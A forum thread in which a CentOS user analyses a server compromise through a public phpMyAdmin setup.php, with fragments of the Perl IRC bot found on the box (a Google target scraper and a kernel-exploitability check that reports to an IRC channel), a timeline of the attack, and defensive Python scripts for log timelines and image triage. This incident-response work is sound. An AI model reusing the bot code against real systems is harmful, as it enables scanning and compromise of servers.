$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}

sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;

}

[/code]

unspawn
Posts: 172
Joined: 2006/12/11 12:28:52

Re: I've been rooted

Post by unspawn » 2010/10/20 00:07:02

[quote]
falcon1620 wrote:
(..) I am going to go through the logs (..)[/quote]
While posting the content of an IRC bot Perl script may be "cute", it's not half as interesting as location, user/group and timestamps (wrt log correlation). Given the amount of web stack attacks, the state of PHP (aka Pretty Horrendous Programming) software, hosts running content accessible from the world or running stale versions of software, the chance this will be an attack directed at the kernel instead of the web stack will prove to be infinitesimal (and that's not speculation). Anyway. Keep us posted.

falcon1620
Posts: 22
Joined: 2009/06/29 19:23:16

Re: I've been rooted

Post by falcon1620 » 2010/10/20 17:35:03

I know :-)

That one I just found while backing stuff off with the Live CD, pretty much right away; I didn't yet have time to go through the logs and whatnot. :pint:

So I have some logs for you so far. Actually, they seem to have been tampered with a bit, because I had quite a few log files archived that are missing, along with some empty log files on there, so I wouldn't exactly say that they are super accurate, but enough to provide a little insight. Something interesting was the fact that they seemed to use the HTTPD daemon to write into the tmp folder, and then run their stuff from tmp, and I even found some CROND logs that indicate that they were able to re-initialize their scripts from /temp/iptraf via cron. Another interesting note is that days before the attack SELinux was blocking some activities, but I found it to be disabled on the system while the cron scripts were executing, so somehow they were able to disable SELinux on the box. One good thing is that although I didn't notice the break-in attempt, I did notice the exploit almost right away, as Monday morning the box was shut down almost right away. Well, next time I might try remote logging to a desktop or another box :-) Most everything else was either missing, wiped, or didn't seem too interesting in terms of logs on this machine here, but I can go get it off of the machine for you if you'd like it. I have the luxury of keeping the machine around for a bit as is. I made a copy of these logs off of my system after doing the backup. I did not yet do too much else.

(Zip Attached)
Enjoy :-D

falcon1620
Posts: 22
Joined: 2009/06/29 19:23:16

Re: I've been rooted

Post by falcon1620 » 2010/10/20 19:07:48

Well, after messing with the forums, it did not allow me to upload the tar or zip with the text file. :lol: So I used Pastebin.

Audit Log
http://pastebin.com/7CLizvc8

CRON
http://pastebin.com/1RSBNbzL

HTTP Access
http://pastebin.com/n0XbynCp

HTTP Error
http://pastebin.com/FdUmygHa

Mail Log
http://pastebin.com/j4XtJ6q0

Messages Log
http://pastebin.com/pwiyyeeF

unspawn
Posts: 172
Joined: 2006/12/11 12:28:52

Re: I've been rooted

Post by unspawn » 2010/10/20 22:54:44

[quote]
falcon1620 wrote:
I have some Logs for you so far. [/quote]
I corroborate what you wrote, here's a quick timeline for messages over the period Oct 10th to 19th 2010:
On Oct 10 - 15 nothing much happens except on the 11th and 15th several successful attempts to find PHPMyAdmin (setup.php) are made.
Oct 16 03:18:43 the first IRC bot / backdoor was downloaded using locally available tools like curl or wget.
On Oct 17 several successful attempts to find PHPMyAdmin (setup.php) are made and SELinux warns about connecting to ports.
Oct 17 08:15:02 a second IRC bot / backdoor was downloaded using curl or wget.
Oct 17 08:15:06 SELinux logs 'killall' usage and a local file name "./1". Other commands logged are 'sh', 'ls' and 'ps'.
Oct 17 15:33:44 SELinux logs 'crontab' usage and a local file name "./cron"
Oct 17 15:33:44 the apache user's crontab is REPLACE'd
Oct 17 15:34:01 crond runs 'perl /tmp/iptraf' for user apache.
Oct 17 16:21:53 load average goes up to 12, reaching 312 on Oct 18 07:29:53.

The fact SELinux was or got disabled and that /phpmyadmin's setup.php was (still there and) accessible publicly (GETs and POSTs) w/o restrictions didn't spell much good. It's (almost but not) funny that most of the time the tell-tale signs are recorded in Apache's error_log, which something like Logwatch or any other log parser *should* report. Since the "victim" runs a XEN kernel, did you run other guests you should inspect as well?


[quote]
falcon1620 wrote:
Most everything else was either missing, wiped or didn't seem to interesting in terms of loggs on this machine here, [/quote]
What was missing?
How did you determine things were wiped?
Could you list all files with apache ownership and modification time between Oct 15 and 18?
Do you still have *all* the temporary files that got dumped on the system?
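The correlation unspawn did by hand above (messages, cron and audit entries laid out on one clock) is worth automating when the log set is larger. The script below is an added example, not something from the thread or from the poster's box: it normalises syslog-format lines (which carry no year and are in the victim's local time) and audit.log lines (which carry epoch seconds) onto one axis, sorts them, and tags the indicators this thread turned up (a download tool being run, a REPLACE'd crontab, execution out of /tmp, killall, an AVC denial, an IRC port). The log lines in SAMPLE_LOGS are constructed for the demo and are not the poster's pastebin contents; the host name, PIDs and paths in them are made up.

```python
"""Unified timeline from /var/log/messages, /var/log/cron and audit.log of a compromised box.
Added example; SAMPLE_LOGS is constructed, not the poster's real data."""
import re
from datetime import datetime, timezone

YEAR = 2010  # syslog lines carry no year; audit lines carry epoch seconds

SYSLOG_RE = re.compile(
    r'^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) '
    r'(?P<host>\S+) (?P<prog>[^:\[]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$')
AUDIT_RE = re.compile(
    r'^type=(?P<type>\w+) msg=audit\((?P<ts>\d+\.\d+):\d+\): (?P<msg>.*)$')

# Indicators matching what unspawn pulled out of the real logs; every label that matches is attached.
INDICATORS = [
    ('download-tool',    re.compile(r'\b(?:wget|curl|fetch|lynx)\b')),
    ('crontab-replaced', re.compile(r'\bREPLACE\b')),
    ('exec-from-tmp',    re.compile(r'(?:^|[\s"(])/(?:tmp|var/tmp|dev/shm)/\S+')),
    ('process-kill',     re.compile(r'\bkillall\b|\bpkill\b')),
    ('avc-denied',       re.compile(r'avc:\s+denied')),
    ('irc-port',         re.compile(r'\bdest=(?:6667|6697)\b')),
]

# Constructed sample (hostname, PIDs and contexts are invented): messages/cron lines are syslog
# format, audit.log lines use epoch timestamps, and the order is deliberately scrambled.
SAMPLE_LOGS = """\
Oct 17 15:34:01 devbox crond[4320]: (apache) CMD (perl /tmp/iptraf)
Oct 17 15:33:44 devbox crontab[4311]: (apache) REPLACE (apache)
Oct 16 03:18:43 devbox setroubleshoot: SELinux is preventing /usr/bin/wget from name_connect access on the tcp_socket. For complete SELinux messages run sealert.
type=SYSCALL msg=audit(1287303306.600:2302): arch=40000003 syscall=11 success=yes exit=0 comm="killall" exe="/usr/bin/killall" cwd="/tmp"
type=AVC msg=audit(1287303306.512:2301): avc:  denied  { name_connect } for  pid=4120 comm="perl" dest=6667 scontext=user_u:system_r:httpd_t:s0 tcontext=system_u:object_r:ircd_port_t:s0 tclass=tcp_socket
Oct 17 16:21:53 devbox kernel: possible SYN flooding on port 80. Sending cookies.
"""


def parse_line(line, year=YEAR, tz=timezone.utc):
    """Return (epoch_seconds, source, message) or None for lines in neither format.
    tz is the victim's time zone: syslog wall-clock times are converted with it so they
    land on the same axis as the audit log's epoch stamps (UTC here for determinism)."""
    m = AUDIT_RE.match(line)
    if m:
        return float(m.group('ts')), 'audit/' + m.group('type'), m.group('msg')
    m = SYSLOG_RE.match(line)
    if m:
        wall = datetime.strptime(f"{m.group('mon')} {m.group('day')} {m.group('time')} {year}",
                                 '%b %d %H:%M:%S %Y').replace(tzinfo=tz)
        return wall.timestamp(), m.group('prog').strip(), m.group('msg')
    return None


def build_timeline(text, year=YEAR, tz=timezone.utc):
    """Parse every line, tag indicators, and return events sorted by time."""
    events = []
    for line in text.splitlines():
        parsed = parse_line(line, year, tz)
        if parsed is None:
            continue
        ts, source, msg = parsed
        events.append({'ts': ts, 'source': source, 'msg': msg,
                       'tags': [label for label, rx in INDICATORS if rx.search(msg)]})
    events.sort(key=lambda e: e['ts'])  # stable sort keeps file order for exact ties
    return events


def render(events, tz=timezone.utc, only_flagged=False):
    """One line per event: 'YYYY-mm-dd HH:MM:SS source [tag,tag] message' ('-' when untagged)."""
    out = []
    for e in events:
        if only_flagged and not e['tags']:
            continue
        when = datetime.fromtimestamp(e['ts'], tz).strftime('%Y-%m-%d %H:%M:%S')
        out.append(f"{when} {e['source']} [{','.join(e['tags']) or '-'}] {e['msg']}")
    return out


if __name__ == '__main__':
    print('\n'.join(render(build_timeline(SAMPLE_LOGS))))
```

Feed it the concatenation of messages, cron and audit.log (`cat /var/log/messages* /var/log/cron* /var/log/audit/audit.log*` from the mounted image), set `tz` to the victim's zone and `year` from the file's ctime, and read the flagged lines first; the untagged lines around them are the context you then go back for.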

falcon1620
Posts: 22
Joined: 2009/06/29 19:23:16

Re: I've been rooted

Post by falcon1620 » 2010/11/02 16:31:28

Well, it's been pretty crazy over here; I am wrapping up a project this month, so sorry for my long delay... What I have done to secure the other systems is, at the very least, remove the phpMyAdmin setup file. Something that I had not even really bothered to look for. I assumed that PHP didn't have such a folder, as often I would configure the authentication manually, connect it to the MySQL server locally and use it to just get stuff done quickly. Didn't even notice the setup folder, kind of threw it on there and used it. As that was the latest that would run under the PHP version 2.1.0 on CentOS without recompiling PHP (defeating the purpose of using CentOS). I have changed access to phpMyAdmin to local users only, and placed it onto a VPN for better security. Also I have ensured that .htaccess on that folder is set up more robustly and in some cases removed phpMyAdmin entirely from my web folder, only to install it when needed (if at all). Now that I know about it I will be removing it from my machines even on PHP that is dealt with via a package manager.

[quote]The fact SELinux was or got disabled and that /phpmyadmin's setup.php was (still there and) accessible publicly (GETs and POSTs) w/o restrictions didn't spell much good. It's (almost but not) funny that most of the time tell-tale signs are recorded in Apache error_log which something like Logwatch or any other log parser *should* report. Since the "victim" runs a XEN kernel did you run other guests you should inspect as well? [/quote]

Yes, I agree; in fact I had monitored and run that system for 5 years! and just kept it up to date since then. It was pretty much the Celeron PowerEdge SC440 from when they had a sale on it for $200 for the box. It was my personal box, used for SSH, SFTP and webmail. I did review the Logwatch files, which occasionally reported to me SSH access attempts a few times before I switched ports and used key authentication for it later on (once I actually learned how to do all that). There was no really suspicious activity outside the norm until the exploit. Almost as if they had found it through a script and took advantage of the exploit right away. One second the box was pretty normal; when I got up and used the internal mail client it was slower and I knew that it had just gotten hacked overnight. Particularly interesting is the Perl code I posted earlier which had that kernel version listed as an "exploitable" kernel. Listed here:
[code]
...
# The bot's kernel check, as posted: unanchored substring matches against `uname -a`;
# on a hit it reports to the IRC channel, otherwise the sub returns 1.
sub rooting {

    my $printl=$_[0];
    my $kern=`uname -a`;
    if ($kern =~ /2.4.17\s/ || $kern =~ /2.4.18\s/ || $kern =~ /2.4.19\s/ || $kern =~ /2.4.20/ ||
        $kern =~ /2.4.20-8/ || $kern =~ /2.4.21\s/ ||
        $kern =~ /2.4.22\s/ || $kern =~ /2.4.22-10\s/ || $kern =~ /2.4.23\s/ || $kern =~ /2.4.24\s/ ||
        $kern =~ /2.4.25-1\s/ || $kern =~ /2.4.26\s/ ||
        $kern =~ /2.4.27\s/ || $kern =~ /2.6.2\s/ || $kern =~ /2.6.5\s/ || $kern =~ /2.6.6\s/ ||
        $kern =~ /2.6.7\s/ || $kern =~ /2.6.8\s/ || $kern =~ /2.6.8-5\s/ ||
        $kern =~ /2.6.9\s/ || $kern =~ /2.6.9-34\s/ || $kern =~ /2.6.10\s/ || $kern =~ /2.6.11/ ||
        $kern =~ /2.6.13\s/ || $kern =~ /2.6.13-17/ || $kern =~ /2.6.14\s/ ||
        $kern =~ /2.6.15\s/ || $kern =~ /2.6.16\s/)
    {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Exploitable Kernel !!]\002 I m an exploitable Kernel: ".`uname -r`);
    }
    else
    {
        return 1;
    }
...
[/code]

The max time lapsed between checking logs was about 1 week, so it was the tail end of that week's time frame. Fact of the matter is that yes, it is true that I didn't remove the phpMyAdmin setup. In fact I didn't really pay that much attention to it, as I typically use phpMyAdmin without much issue. I have since gotten over using SQL through phpMyAdmin entirely and can now create and use the MySQL command line interface, which is actually easier in my opinion since most things are only connecting to the MySQL socket locally anyway. So there is less of a need. I guess that on this machine someone removed my .htaccess file which restricted phpMyAdmin, and in fact my friend did say that he had removed it the week prior to the attack because he needed it for a project. Well, I do find it amusing or interesting, but only because it's a personal box, not one that I am using say for business daily. Anyhow, I can say that in fact Logwatch has taught me a lot about Linux administration (coming from the Windows security background, and being a Mac user as a kid (pre OS X era), aside from my DOS 2.11 days) and has actually allowed me to make some changes to services like mail, SSH and web before people caused any harm. Usually you could pick up on intrusion attempts and then go fix configuration issues that didn't typically lend themselves to vulnerability, unlike in this case, where setup was accessed and exploited. Now prior to the attack SELinux was Enforcing, and I confirmed that with another user on the system. Up until the attack, as far as I can tell, SELinux was set to Enforcing.

I didn't have any XEN guests running at the time, and in fact there were no XEN images on the system either. Those were wiped clean. I built a few XEN guests on that server box and moved them over, but they are all running fine and are clean of any malware. I use the XEN Kernel occasionally to mess with XEN or build XEN images.

[quote]
unspawn wrote:
What was missing? [/quote]
Just about any other log files were missing, that was really about it. Some low-level system logs like dmesg dumps and stuff were left on, but almost all service logs and log archives were wiped. Including logs that I had actually previously gone through myself and gzipped up to copy or move them. There were about 5 years' worth of logs on all services on there that were typically backed up. All of them were wiped clean. No logs indicated an intrusion attempt during that time. Which says that the intruder attempted to wipe the logs after initially gaining access to the system in a haphazard fashion. One more day and I would have noticed that most of the logs were wiped clean. I assume that he would have wiped the logs that I had gotten as well if I had allowed the server to continue running, but I forced a rather brute and sudden shutdown. During the span of that week, who knows what was on there. I would suspect that you would see more of the same, attacks against phpMyAdmin in the HTTP error log. Once they got in it was instantaneous. Additionally Logwatch files are forwarded to my mail account, which is typically checked just about every day on that particular machine so that I can read them. :-)

[quote]
unspawn wrote:
How did you determine things were wiped? [/quote]
Just the logs were wiped, and there was also a folder with an escaped space, or similar, as an attempt to hide the obviousness of it. But the folder didn't contain anything. Maybe the folder was used temporarily to execute some code and clean up shop some before installing the bot script. It appears that the intruder was also particular about how the bot script would run, and once he had access to the machine wasn't concerned about getting back in through the exploit, because his cron script would go nab the bot again and execute it. Although I did go through the system's /etc/cron.d files, there must have been another instance of cron running because I did not see any cron jobs that were malicious. I also ran a diff on the cron configuration files against a good machine from another location (internal use only) with similar services running, and they didn't find anything that was outside of system admin changes, so I am not sure quite what to make of this; maybe cron was being run elsewhere? Entirely possible, but if they did I didn't easily find it.

[quote]
unspawn wrote:
Could you list all files with apache ownership and modification time between Oct 15 and 18? [/quote]
Now for "apache" file ownership, I noticed that there were two apache users, one with a lower-case "apache" and one with an upper-case "Apache". Unless there were other strange escaped folders on the system, I didn't see anything. There were no other user accounts created, and no nasty files in any user accounts' folders. There were only 5 accounts on that machine total and about 2 which had direct access to sudo or root.

[quote]
unspawn wrote:
Do you still have *all* the temporary files that got dumped on the system? [/quote]
I think so, I will try to get them from my image for you... But I noticed only 2 items: the empty folder with an escaped space as the folder name, which was totally empty, and the bot script. All other files were files that were owned by the system and things that I expected to see, with about the same file sizes in there for that machine. I would have noticed changes, since I used the tmp folder to dump some shell script output too during my shell scripting class, so...
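The three questions unspawn asked (apache-owned files in the Oct 15 to 18 window, what cron actually ran, and the temporary files) can be answered against the kept image instead of the live box, and two details from the posts above change how that is done: the per-user crontab that `crontab` REPLACE'd lives in the spool directory var/spool/cron/<user> on CentOS 5, which a diff of /etc/cron.d and /etc/crontab never shows, and there were two accounts, "apache" and "Apache", so uid lookup has to be case-insensitive and has to read the image's own etc/passwd rather than the analysis host's. The script below is an added example, not the poster's tooling or anything from CentOS: point `triage()` at a read-only mount of the image and it lists owned paths in the window, dumps those users' crontab spools, and flags names made only of dots and whitespace (the "escaped space" folder). `demo()` builds a constructed image tree in a temp directory, with made-up paths, uids and timestamps chosen to mirror the thread, so the code runs without the real image.

```python
"""Offline triage of a mounted image after an 'apache' compromise. Added example;
demo() creates a constructed tree (not the poster's image) so it runs anywhere."""
import os
import shutil
import tempfile
from datetime import datetime, timezone


def resolve_uids(image_root, account='apache'):
    """{name: uid} for every account whose name equals `account` ignoring case,
    read from the image's etc/passwd, not from the analysis host."""
    uids = {}
    with open(os.path.join(image_root, 'etc', 'passwd')) as fh:
        for line in fh:
            parts = line.rstrip('\n').split(':')
            if len(parts) >= 3 and parts[0].lower() == account.lower():
                uids[parts[0]] = int(parts[2])
    return uids


def epoch(dt):
    """Naive datetime treated as UTC -> epoch seconds (set the victim's zone here if it matters)."""
    return dt.replace(tzinfo=timezone.utc).timestamp()


def files_owned_in_window(image_root, uids, start, end):
    """Every entry (files and dirs, symlinks not followed) owned by a uid in `uids`
    with start <= mtime < end, sorted by mtime then path."""
    lo, hi = epoch(start), epoch(end)
    hits = []
    for dirpath, dirnames, filenames in os.walk(image_root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if st.st_uid in uids and lo <= st.st_mtime < hi:
                when = datetime.fromtimestamp(st.st_mtime, timezone.utc)
                hits.append({'path': os.path.relpath(full, image_root), 'uid': st.st_uid,
                             'mtime': when.strftime('%Y-%m-%d %H:%M:%S')})
    return sorted(hits, key=lambda h: (h['mtime'], h['path']))


def user_crontabs(image_root, users):
    """Per-user crontab spool files; these jobs never appear in /etc/crontab or /etc/cron.d."""
    found = {}
    for user in users:
        spool = os.path.join(image_root, 'var', 'spool', 'cron', user)
        if os.path.isfile(spool):
            with open(spool) as fh:
                found[user] = fh.read()
    return found


def odd_names(image_root):
    """Entries whose names are only dots/whitespace or contain control characters."""
    odd = []
    for dirpath, dirnames, filenames in os.walk(image_root):
        for name in dirnames + filenames:
            if set(name) <= set('. \t') or any(ord(c) < 32 for c in name):
                odd.append(os.path.relpath(os.path.join(dirpath, name), image_root))
    return sorted(odd)


def triage(image_root, start, end):
    uids = resolve_uids(image_root)
    return {'accounts': uids,
            'files': files_owned_in_window(image_root, set(uids.values()), start, end),
            'crontabs': user_crontabs(image_root, uids),
            'odd_names': odd_names(image_root)}


def demo():
    """Constructed stand-in for the real mount. The files are owned by whoever runs this,
    so the passwd entry for 'apache' is given that uid; everything else is invented."""
    root = tempfile.mkdtemp(prefix='image-')
    me = os.getuid()

    def put(rel, content, when):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'w') as fh:
            fh.write(content)
        os.utime(path, (epoch(when), epoch(when)))

    try:
        put('etc/passwd', f'root:x:0:0:root:/root:/bin/bash\napache:x:{me}:{me}:Apache:/var/www:/sbin/nologin\n'
            'Apache:x:5001:5001::/home/Apache:/bin/bash\n', datetime(2010, 10, 17, 8, 20, 0))
        put('var/www/html/index.php', '<?php echo "hi"; ?>\n', datetime(2010, 10, 1, 12, 0, 0))
        put('var/www/html/phpmyadmin/config.inc.php', '<?php $cfg = array(); ?>\n', datetime(2010, 10, 16, 3, 18, 43))
        put('tmp/iptraf', '#!/usr/bin/perl\n# bot body elided\n', datetime(2010, 10, 17, 15, 33, 50))
        put('var/spool/cron/apache', '*/5 * * * * perl /tmp/iptraf >/dev/null 2>&1\n', datetime(2010, 10, 17, 15, 33, 44))
        put('var/log/messages', 'Oct 19 06:00:00 devbox syslogd: restart\n', datetime(2010, 10, 19, 6, 0, 0))
        os.makedirs(os.path.join(root, 'tmp', '. '), exist_ok=True)  # the "escaped space" folder
        return triage(root, datetime(2010, 10, 15), datetime(2010, 10, 19))  # end is exclusive: Oct 15-18
    finally:
        shutil.rmtree(root)


if __name__ == '__main__':
    for key, value in demo().items():
        print(key, value)
```

Against a real image, mount it read-only (`mount -o ro,noexec,nodev,noload`), pass the mount point as `image_root`, and keep the output with the image: the mtime list from the window is the question unspawn asked, and the spool file is the cron job the /etc/cron.d diff could not find.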
